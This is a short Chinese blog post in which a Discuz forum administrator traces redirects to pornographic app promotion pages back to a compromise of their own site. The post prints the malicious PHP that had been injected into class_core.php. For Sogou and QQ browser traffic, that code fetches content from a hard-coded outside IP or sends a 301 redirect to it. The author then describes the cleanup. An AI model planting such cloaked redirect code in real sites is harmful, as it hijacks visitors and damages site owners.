我的一个discuz论坛前段时间有会员反馈打开跳转到不堪入目的色情APP推广页面,让我马上处理。页面是这样的:

马上测试,PC端页面正常,换多个浏览器测试正常,页面html,js代码检查,正常。

手机上测试,我安卓手机,常用系统自带浏览器,测试正常,源码正常,但进入时安全提示可能包含赌博信息。到这一步我怀疑是会员当地的运营商流量劫持,或手机遭恶意APP篡改。

详细询问会员更多细节,发现会员使用的是QQ浏览器,我猜会不会是浏览器干了什么PY勾当,也下载了个试了试,立马炸了。心想腾讯太无耻了,欺负我们小网站,居然劫持小网站流量恰这种烂饭,无耻无耻无耻。

后来我又试了试把QQ浏览器UA改成IOS,打开就是正常页面,我心里一万只草泥马奔腾而过,腾讯不光恰烂饭,还歧视安卓用户。

再后来一想,人家企业家大业大,应该不差这几个烂钱,不至于这么下作。说不定真是网站被入侵篡改。初步猜测是有文件被做了301跳转。

于是我从启动文件index.php开始,挨个检查文件,果然,到source/class/class_core.php文件下多了这样一段代码,这就是罪魁祸首!它意思是,凡是用搜狗/qq浏览器或从搜索搜狗进来的,全301跳转到指定页面

$url = "http://103.100.60.194/"; 
if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),'sogou') !== false ) 
{ 
    $file = file_get_contents($url); 
    echo $file;
    exit; 
} 
if(stristr ($_SERVER['HTTP_REFERER'],"m.sogou.com")||stristr ($_SERVER['HTTP_REFERER'],"wap.sogou.com")) 
{
    Header("HTTP/1.1 301 Moved Permanently"); 
    Header("Location: $url");
    exit; 
}

我赶紧去dz官方找了完整文件,把class_core.php给替换回来。QQ浏览器测试,恢复正常,搞定!等等,后面还有。

第二天我又测了一次,居然发现又跳转到色情推广页面,这个文件又被改了,赶紧替换回来。猜测木马文件可能隐藏在某个角落,对方定时请求执行,一来被修复的可以改回去,二来更新他可能被封掉的URL。

我到dz后台,找到文件校验开始执行,按照结果把被修改的、和未知文件挨个排查。发现多个异常文件,删除或替换后恢复正常。

最后编辑:2020年10月16日 ©著作权归作者所有

发表评论